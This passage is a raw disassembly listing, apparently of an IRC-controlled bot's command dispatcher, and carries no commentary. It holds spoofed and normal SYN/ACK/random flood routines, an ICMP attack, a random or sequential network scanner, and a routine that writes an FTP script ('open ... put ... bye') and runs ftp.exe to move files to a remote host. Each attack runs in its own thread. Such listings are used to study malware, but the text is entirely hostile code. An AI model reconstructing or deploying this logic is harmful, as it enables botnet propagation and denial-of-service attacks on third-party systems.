lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_40F5F3: ; CODE XREF: sub_40CD3A+289B�j
; sub_40CD3A+5381�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
jmp loc_412999
; ---------------------------------------------------------------------------
loc_40F604: ; CODE XREF: sub_40CD3A+2881�j
call dword_42104C ; GetTickCount
push eax
call sub_415368
pop ecx
call sub_415372
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_415372
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_415372
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1DD4]
push edx
push eax
lea eax, [ebp+var_1694]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_415316
lea eax, [ebp+var_1694]
push offset aAb ; "ab"
push eax
call sub_415A08
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40D18F
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_4159B6
push [ebp+arg_24]
call sub_415960
lea eax, [ebp+var_1694]
push eax
lea eax, [ebp+var_A7C]
push offset aSS_4 ; "-s:%s"
push eax
call sub_415316
add esp, 2Ch
lea eax, [ebp+var_A7C]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_43C998 ; ShellExecuteA
push edi
push esi
test eax, eax
jz short loc_40F6CE
push offset dword_4357A8
jmp short loc_40F6D3
; ---------------------------------------------------------------------------
loc_40F6CE: ; CODE XREF: sub_40CD3A+298B�j
push offset dword_435768
loc_40F6D3: ; CODE XREF: sub_40CD3A+2992�j
call sub_415316
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40F6FC
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_40F6FC: ; CODE XREF: sub_40CD3A+29A4�j
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
jmp short loc_40F716
; ---------------------------------------------------------------------------
loc_40F70A: ; CODE XREF: sub_40CD3A+29EF�j
lea eax, [ebp+var_1694]
push eax
call sub_41791C
loc_40F716: ; CODE XREF: sub_40CD3A+29CE�j
lea eax, [ebp+var_1694]
push 4
push eax
call sub_40C0F3
add esp, 0Ch
test eax, eax
jnz short loc_40F70A
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_40F730: ; CODE XREF: sub_40CD3A+2835�j
; sub_40CD3A+284C�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_41587F
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_406A63
jmp loc_412815
; ---------------------------------------------------------------------------
loc_40F75E: ; CODE XREF: sub_40CD3A+2659�j
; sub_40CD3A+2670�j
mov esi, 80h
push edi
lea eax, [ebp+var_1104]
push esi
push eax
call sub_41588A
lea eax, [ebp+var_1104]
push eax
push offset aSyn ; "syn"
call sub_415730
add esp, 14h
test eax, eax
jz short loc_40F7C1
lea eax, [ebp+var_1104]
push eax
push offset aAck ; "ack"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40F7C1
lea eax, [ebp+var_1104]
push eax
push offset aRandom ; "random"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40F7C1
push offset dword_435728
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40F7C1: ; CODE XREF: sub_40CD3A+2A4D�j
; sub_40CD3A+2A64�j ...
push [ebp+arg_10]
call sub_41587F
cmp eax, ebx
pop ecx
mov [ebp+var_FFC], eax
jle loc_40F8E3
push edi
lea eax, [ebp+var_1104]
push esi
push eax
call sub_41588A
push [ebp+arg_18]
lea eax, [ebp+var_1184]
push esi
push eax
call sub_41588A
push [ebp+arg_0]
call sub_41587F
mov [ebp+var_1000], eax
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_FF8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1188], eax
lea eax, [ebp+var_1084]
push esi
push eax
call sub_41588A
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_FF8], ebx
mov [ebp+var_FF4], eax
mov eax, [ebp+var_8]
mov [ebp+var_FF0], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40F858
mov eax, offset aNormal ; "Normal"
loc_40F858: ; CODE XREF: sub_40CD3A+2B17�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset dword_4356D0
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
push ebx
lea eax, [ebp+var_2D8]
push 0Ch
push eax
call sub_414DDA
add esp, 2Ch
mov [ebp+var_1004], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1188]
push ebx
push eax
push offset sub_401BD4
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1004]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40F8D9
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_435680
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_40F8D1: ; CODE XREF: sub_40CD3A+2BA5�j
push 32h
call dword_421060 ; Sleep
loc_40F8D9: ; CODE XREF: sub_40CD3A+2B84�j
cmp [ebp+var_FEC], ebx
jz short loc_40F8D1
jmp short loc_40F8F6
; ---------------------------------------------------------------------------
loc_40F8E3: ; CODE XREF: sub_40CD3A+2A98�j
push offset dword_435630
loc_40F8E8: ; CODE XREF: sub_40CD3A+1B59�j
; sub_40CD3A+1C63�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_415316
pop ecx
pop ecx
loc_40F8F6: ; CODE XREF: sub_40CD3A+1C2B�j
; sub_40CD3A+1C3F�j ...
cmp [ebp+var_8], ebx
jnz loc_40D68B
push ebx
push [ebp+var_4]
loc_40F903: ; CODE XREF: sub_40CD3A+3776�j
lea eax, [ebp+var_2D8]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_40F913: ; CODE XREF: sub_40CD3A+505E�j
call sub_412BD1
add esp, 14h
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_40F920: ; CODE XREF: sub_40CD3A+2614�j
; sub_40CD3A+262B�j ...
cmp dword_43CB10, ebx
mov esi, [ebp+arg_4]
jnz loc_40FA2B
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_590], eax
mov eax, [ebp+var_4]
mov [ebp+var_594], eax
lea eax, [ebp+var_628]
push edi
push eax
call sub_416BE0
push [ebp+arg_18]
call sub_41587F
push [ebp+arg_0]
mov [ebp+var_5A8], eax
call sub_41587F
push [ebp+arg_10]
mov [ebp+var_5A4], eax
call sub_41587F
push 7Fh
mov [ebp+var_5A0], eax
push [ebp+var_8C]
lea eax, [ebp+var_6A8]
push eax
call sub_416BE0
push [ebp+var_5A0]
lea eax, [ebp+var_628]
mov [ebp+var_6AC], esi
push [ebp+var_5A4]
push eax
lea eax, [ebp+var_2D8]
push [ebp+var_5A8]
push offset unk_4355D0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 0Eh
push eax
call sub_414DDA
add esp, 48h
mov [ebp+var_598], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6AC]
push ebx
push eax
push offset sub_40A133
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_598]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40FA1E
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_435580
jmp loc_4105A5
; ---------------------------------------------------------------------------
loc_40FA16: ; CODE XREF: sub_40CD3A+2CEA�j
push 32h
call dword_421060 ; Sleep
loc_40FA1E: ; CODE XREF: sub_40CD3A+2CC9�j
cmp [ebp+var_58C], ebx
jz short loc_40FA16
jmp loc_4105B4
; ---------------------------------------------------------------------------
loc_40FA2B: ; CODE XREF: sub_40CD3A+2BEF�j
push 1FFh
lea eax, [ebp+var_2D8]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_416BE0
jmp loc_4105B1
; ---------------------------------------------------------------------------
loc_40FA46: ; CODE XREF: sub_40CD3A+25CF�j
; sub_40CD3A+25E6�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_590], eax
mov eax, [ebp+var_4]
mov [ebp+var_594], eax
lea eax, [ebp+var_628]
push edi
push eax
call sub_416BE0
push [ebp+arg_18]
call sub_41587F
push [ebp+arg_0]
mov [ebp+var_5A8], eax
call sub_41587F
push [ebp+arg_10]
mov [ebp+var_5A4], eax
call sub_41587F
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_5A0], eax
jz short loc_40FAAB
push esi
call sub_41587F
pop ecx
mov [ebp+var_59C], eax
jmp short loc_40FAB1
; ---------------------------------------------------------------------------
loc_40FAAB: ; CODE XREF: sub_40CD3A+2D60�j
mov [ebp+var_59C], ebx
loc_40FAB1: ; CODE XREF: sub_40CD3A+2D6F�j
push 7Fh
lea eax, [ebp+var_6A8]
push [ebp+var_8C]
push eax
call sub_416BE0
push [ebp+var_5A0]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_628]
mov [ebp+var_6AC], esi
push [ebp+var_5A4]
push eax
lea eax, [ebp+var_2D8]
push [ebp+var_5A8]
push offset dword_435508
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 0Fh
push eax
call sub_414DDA
add esp, 30h
mov [ebp+var_598], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6AC]
push ebx
push eax
push offset sub_40A2BF
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_598]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40FB58
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_4354B8
jmp loc_4105A5
; ---------------------------------------------------------------------------
loc_40FB50: ; CODE XREF: sub_40CD3A+2E24�j
push 32h
call dword_421060 ; Sleep
loc_40FB58: ; CODE XREF: sub_40CD3A+2E03�j
cmp [ebp+var_58C], ebx
jz short loc_40FB50
jmp loc_4105B4
; ---------------------------------------------------------------------------
loc_40FB65: ; CODE XREF: sub_40CD3A+25A1�j
; sub_40CD3A+25B8�j
push 8
call sub_41501C
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_41587F
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 12Ch
jle short loc_40FBB5
push [ebp+arg_8]
lea eax, [ebp+var_2D8]
push offset dword_435460
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
jmp loc_410FD3
; ---------------------------------------------------------------------------
loc_40FBB5: ; CODE XREF: sub_40CD3A+2E47�j
push edi
call sub_41587F
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_41587F
push [ebp+arg_0]
mov [ebp+var_45C], eax
call sub_41587F
add esp, 0Ch
cmp eax, 1
mov [ebp+var_470], eax
jnb short loc_40FBEE
xor eax, eax
inc eax
mov [ebp+var_470], eax
loc_40FBEE: ; CODE XREF: sub_40CD3A+2EA9�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40FBFB
mov [ebp+var_470], ecx
loc_40FBFB: ; CODE XREF: sub_40CD3A+2EB9�j
push [ebp+arg_10]
call sub_41587F
mov [ebp+var_46C], eax
mov eax, 1F4h
cmp [ebp+var_46C], eax
pop ecx
jbe short loc_40FC1D
mov [ebp+var_46C], eax
loc_40FC1D: ; CODE XREF: sub_40CD3A+2EDB�j
or [ebp+var_458], 0FFFFFFFFh
cmp dword_427388, ebx
mov [ebp+arg_10], ebx
jz short loc_40FC73
mov [ebp+arg_24], offset dword_427388
loc_40FC36: ; CODE XREF: sub_40CD3A+2F1B�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40FC59
add [ebp+arg_24], 3Ch
inc [ebp+arg_10]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_40FC36
jmp short loc_40FC73
; ---------------------------------------------------------------------------
loc_40FC59: ; CODE XREF: sub_40CD3A+2F0D�j
mov eax, [ebp+arg_10]
mov ecx, eax
mov [ebp+var_458], eax
imul ecx, 3Ch
mov ecx, dword_427388[ecx]
mov [ebp+var_474], ecx
loc_40FC73: ; CODE XREF: sub_40CD3A+2EF3�j
; sub_40CD3A+2F1D�j
cmp [ebp+var_474], ebx
jz loc_411AD3
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_40FCBA
cmp byte ptr [edi], 23h
jz short loc_40FCBA
push edi
lea eax, [ebp+var_588]
push 10h
push eax
call sub_41588A
push 78h
push edi
call sub_416F20
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_448], eax
jmp loc_40FD8E
; ---------------------------------------------------------------------------
loc_40FCBA: ; CODE XREF: sub_40CD3A+2F4E�j
; sub_40CD3A+2F53�j
cmp [ebp+var_8FF], bl
jnz short loc_40FCDC
cmp [ebp+var_8FE], bl
jnz short loc_40FCDC
cmp [ebp+var_8EE], bl
jnz short loc_40FCDC
push offset dword_435410
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_40FCDC: ; CODE XREF: sub_40CD3A+2F86�j
; sub_40CD3A+2F8E�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_D0]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call dword_43C9C8 ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_CC], eax
push [ebp+var_CC]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_588]
push eax
call sub_416BE0
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_40FD88
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_588]
push eax
call sub_416EE0
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_40FD7C
loc_40FD5A: ; CODE XREF: sub_40CD3A+3040�j
cmp eax, ebx
jz short loc_40FD7C
mov byte ptr [eax], 78h
lea eax, [ebp+var_588]
push 30h
push eax
call sub_416EE0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_40FD5A
loc_40FD7C: ; CODE XREF: sub_40CD3A+301E�j
; sub_40CD3A+3022�j
mov [ebp+var_448], 1
jmp short loc_40FD8E
; ---------------------------------------------------------------------------
loc_40FD88: ; CODE XREF: sub_40CD3A+2FF8�j
mov [ebp+var_448], ebx
loc_40FD8E: ; CODE XREF: sub_40CD3A+2F7B�j
; sub_40CD3A+304C�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_478], eax
mov eax, [ebp+var_4]
mov [ebp+var_450], eax
mov eax, [ebp+var_8]
mov [ebp+var_44C], eax
mov edi, 80h
lea eax, [ebp+var_578]
push edi
push eax
call sub_41588A
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_40FDDF
loc_40FDCC: ; CODE XREF: sub_40CD3A+30C8�j
push esi
loc_40FDCD: ; CODE XREF: sub_40CD3A+30B2�j
lea eax, [ebp+var_4F8]
push edi
push eax
call sub_41588A
add esp, 0Ch
jmp short loc_40FE0A
; ---------------------------------------------------------------------------
loc_40FDDF: ; CODE XREF: sub_40CD3A+3090�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40FDEE
cmp byte ptr [eax], 23h
jnz short loc_40FDEE
push eax
jmp short loc_40FDCD
; ---------------------------------------------------------------------------
loc_40FDEE: ; CODE XREF: sub_40CD3A+30AA�j
; sub_40CD3A+30AF�j
mov esi, offset dword_42C300
push offset byte_43B658
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_40FDCC
mov [ebp+var_4F8], bl
loc_40FE0A: ; CODE XREF: sub_40CD3A+30A3�j
cmp [ebp+var_448], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_40FE1C
mov eax, offset aSequential ; "Sequential"
loc_40FE1C: ; CODE XREF: sub_40CD3A+30DB�j
push [ebp+var_45C]
lea ecx, [ebp+var_588]
push [ebp+var_46C]
push [ebp+var_470]
push [ebp+var_474]
push ecx
push eax
lea eax, [ebp+var_2D8]
push offset dword_435380
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 8
push eax
call sub_414DDA
add esp, 2Ch
mov [ebp+var_468], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_588]
push ebx
push eax
push offset sub_4078DF
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_468]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40FEAD
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_435330
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_40FEA5: ; CODE XREF: sub_40CD3A+3179�j
push 32h
call dword_421060 ; Sleep
loc_40FEAD: ; CODE XREF: sub_40CD3A+3158�j
cmp [ebp+var_444], ebx
jz short loc_40FEA5
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_40FEBA: ; CODE XREF: sub_40CD3A+2561�j
; sub_40CD3A+2578�j
push edi
call sub_41587F
imul eax, 234h
pop ecx
cmp byte_441BB0[eax], bl
jz loc_412818
cmp [ebp+var_C], ebx
jz loc_412818
push [ebp+arg_18]
call sub_415B10
push edi
mov esi, eax
call sub_415B10
push [ebp+arg_8]
add esi, eax
call sub_415B10
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_4158E0
mov esi, eax
lea eax, [ebp+var_2D8]
push esi
push offset dword_435320
push eax
call sub_415316
add esp, 20h
cmp esi, ebx
jz loc_412818
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
push ebx
lea eax, [ebp+var_2D8]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412BD1
push edi
call sub_41587F
imul eax, 234h
add esp, 18h
cmp byte ptr dword_441998[eax], 73h
jnz loc_412818
push esi
push edi
call sub_41587F
imul eax, 234h
pop ecx
add eax, offset byte_441BB0
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_40FFA2: ; CODE XREF: sub_40CD3A+3362�j
lea eax, [ebp+var_2D8]
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
jmp loc_411F81
; ---------------------------------------------------------------------------
loc_40FFCC: ; CODE XREF: sub_40CD3A+2533�j
; sub_40CD3A+254A�j
push edi
call sub_41587F
imul eax, 234h
pop ecx
cmp byte_441BB0[eax], bl
jz loc_412818
cmp [ebp+var_C], ebx
jz loc_412818
push [ebp+arg_18]
call sub_415B10
push edi
mov esi, eax
call sub_415B10
push [ebp+arg_8]
add esi, eax
call sub_415B10
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_4158E0
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_412818
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412BD1
push edi
call sub_41587F
imul eax, 234h
add esp, 18h
cmp byte ptr dword_441998[eax], 73h
jnz loc_412818
push esi
push edi
call sub_41587F
imul eax, 234h
pop ecx
add eax, offset byte_441BB0
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_40FFA2
; ---------------------------------------------------------------------------
loc_4100A1: ; CODE XREF: sub_40CD3A+2505�j
; sub_40CD3A+251C�j
push edi
call dword_43CA64 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_388], eax
call sub_41587F
push [ebp+arg_0]
mov [ebp+var_394], eax
call sub_41587F
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_390], eax
lea eax, [ebp+var_414]
mov [ebp+var_418], esi
push eax
call sub_416BE0
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_380], edi
push [ebp+var_390]
mov [ebp+var_37C], eax
push [ebp+var_394]
push [ebp+var_388]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_2D8]
push offset unk_4352B0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 8
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_38C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_418]
push ebx
push eax
push offset sub_4143AF
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_38C]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_410186
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_435260
jmp loc_411D70
; ---------------------------------------------------------------------------
loc_41017E: ; CODE XREF: sub_40CD3A+3452�j
push 32h
call dword_421060 ; Sleep
loc_410186: ; CODE XREF: sub_40CD3A+3431�j
cmp [ebp+var_378], ebx
jz short loc_41017E
jmp loc_411D7F
; ---------------------------------------------------------------------------
loc_410193: ; CODE XREF: sub_40CD3A+24D7�j
; sub_40CD3A+24EE�j
push edi
call sub_41587F
push 7Fh
mov [ebp+var_EDC], eax
push [ebp+arg_18]
lea eax, [ebp+var_FE0]
push eax
call sub_416BE0
push [ebp+arg_0]
call sub_41587F
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_EE0], eax
lea eax, [ebp+var_F60]
push 80h
push eax
mov [ebp+var_FE8], esi
call sub_41588A
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_ECC], eax
push [ebp+var_EE0]
lea eax, [ebp+var_FE0]
mov [ebp+var_ED0], edi
push eax
push [ebp+var_EDC]
push esi
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_2D8]
push offset dword_435210
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 10h
push eax
call sub_414DDA
add esp, 24h
mov [ebp+var_ED8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FE8]
push ebx
push eax
push offset sub_407B36
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_ED8]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_41027F
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_4351B8
jmp loc_411D70
; ---------------------------------------------------------------------------
loc_410277: ; CODE XREF: sub_40CD3A+354B�j
push 32h
call dword_421060 ; Sleep
loc_41027F: ; CODE XREF: sub_40CD3A+352A�j
cmp [ebp+var_EC8], ebx
jz short loc_410277
jmp loc_411D7F
; ---------------------------------------------------------------------------
loc_41028C: ; CODE XREF: sub_40CD3A+24A9�j
; sub_40CD3A+24C0�j
push 0FFh
lea eax, [ebp+var_D34]
push edi
push eax
call sub_416BE0
push 0FFh
lea eax, [ebp+var_C34]
push [ebp+arg_18]
push eax
call sub_416BE0
push [ebp+arg_0]
mov [ebp+var_B30], ebx
call sub_41587F
mov [ebp+var_B2C], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_4102E8
push 10h
push ebx
push eax
call sub_416930
add esp, 0Ch
mov [ebp+var_B24], eax
jmp short loc_4102EE
; ---------------------------------------------------------------------------
loc_4102E8: ; CODE XREF: sub_40CD3A+3598�j
mov [ebp+var_B24], ebx
loc_4102EE: ; CODE XREF: sub_40CD3A+35AC�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_410305
push esi
call sub_41587F
pop ecx
mov [ebp+var_B28], eax
jmp short loc_41030B
; ---------------------------------------------------------------------------
loc_410305: ; CODE XREF: sub_40CD3A+35BA�j
mov [ebp+var_B28], ebx
loc_41030B: ; CODE XREF: sub_40CD3A+35C9�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_B20], eax
lea eax, [ebp+var_DB4]
mov [ebp+var_DB8], esi
push eax
call sub_416BE0
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_B18], eax
mov eax, [ebp+var_8]
mov [ebp+var_B1C], eax
push edi
lea eax, [ebp+var_2D8]
push offset unk_435174
push eax
call sub_415316
push esi
lea eax, [ebp+var_2D8]
push 15h
push eax
call sub_414DDA
add esp, 28h
mov [ebp+var_B34], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_DB8]
push ebx
push eax
push offset sub_40BBF7
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_B34]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4103BC
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_435120
jmp loc_4105A5
; ---------------------------------------------------------------------------
loc_4103B4: ; CODE XREF: sub_40CD3A+3688�j
push 32h
call dword_421060 ; Sleep
loc_4103BC: ; CODE XREF: sub_40CD3A+3667�j
cmp [ebp+var_B14], ebx
jz short loc_4103B4
jmp loc_4105B4
; ---------------------------------------------------------------------------
loc_4103C9: ; CODE XREF: sub_40CD3A+247B�j
; sub_40CD3A+2492�j
push 7Fh
lea eax, [ebp+var_1A38]
pop esi
push esi
push edi
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_19B8]
push [ebp+arg_18]
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_1938]
push [ebp+arg_0]
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_18B8]
push [ebp+var_8C]
push eax
call sub_416BE0
mov eax, [ebp+var_8]
push [ebp+arg_0]
mov esi, [ebp+var_4]
mov [ebp+var_1830], eax
mov eax, [ebp+arg_4]
push [ebp+arg_18]
mov [ebp+var_1A3C], eax
lea eax, [ebp+var_2D8]
push edi
push offset dword_4350E0
push eax
mov [ebp+var_1834], esi
call sub_415316
add esp, 44h
lea eax, [ebp+var_2D8]
push ebx
push 0Bh
push eax
call sub_414DDA
add esp, 0Ch
mov [ebp+var_1838], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1A3C]
push ebx
push eax
push offset sub_40182F
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1838]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4104BD
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D8]
push offset dword_435090
push eax
call sub_415316
add esp, 0Ch
loc_4104A5: ; CODE XREF: sub_40CD3A+378B�j
cmp [ebp+var_8], ebx
jnz loc_40D68B
push ebx
push esi
jmp loc_40F903
; ---------------------------------------------------------------------------
loc_4104B5: ; CODE XREF: sub_40CD3A+3789�j
push 32h
call dword_421060 ; Sleep
loc_4104BD: ; CODE XREF: sub_40CD3A+374E�j
cmp [ebp+var_182C], ebx
jz short loc_4104B5
jmp short loc_4104A5
; ---------------------------------------------------------------------------
loc_4104C7: ; CODE XREF: sub_40CD3A+2436�j
; sub_40CD3A+244D�j ...
push 7Fh
lea eax, [ebp+var_1CC8]
pop esi
push esi
push edi
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_1C48]
push [ebp+arg_18]
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_1BC8]
push [ebp+arg_0]
push eax
call sub_416BE0
push esi
lea eax, [ebp+var_1B48]
push [ebp+var_8C]
push eax
call sub_416BE0
push 20h
lea eax, [ebp+var_1AC8]
push [ebp+arg_8]
push eax
call sub_416BE0
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov esi, [ebp+arg_4]
mov [ebp+var_1A48], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_1A44], eax
lea eax, [ebp+var_2D8]
push edi
push offset dword_435048
push eax
mov [ebp+var_1CD0], esi
call sub_415316
add esp, 50h
lea eax, [ebp+var_2D8]
push ebx
push 0Ah
push eax
call sub_414DDA
add esp, 0Ch
mov [ebp+var_1CCC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1CD0]
push ebx
push eax
push offset start
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1CCC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4105CE
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434FF8
loc_4105A5: ; CODE XREF: sub_40CD3A+2CD7�j
; sub_40CD3A+2E11�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_415316
loc_4105B1: ; CODE XREF: sub_40CD3A+2D07�j
add esp, 0Ch
loc_4105B4: ; CODE XREF: sub_40CD3A+2CEC�j
; sub_40CD3A+2E26�j ...
cmp [ebp+var_8], ebx
jnz loc_40D68B
push ebx
push [ebp+var_4]
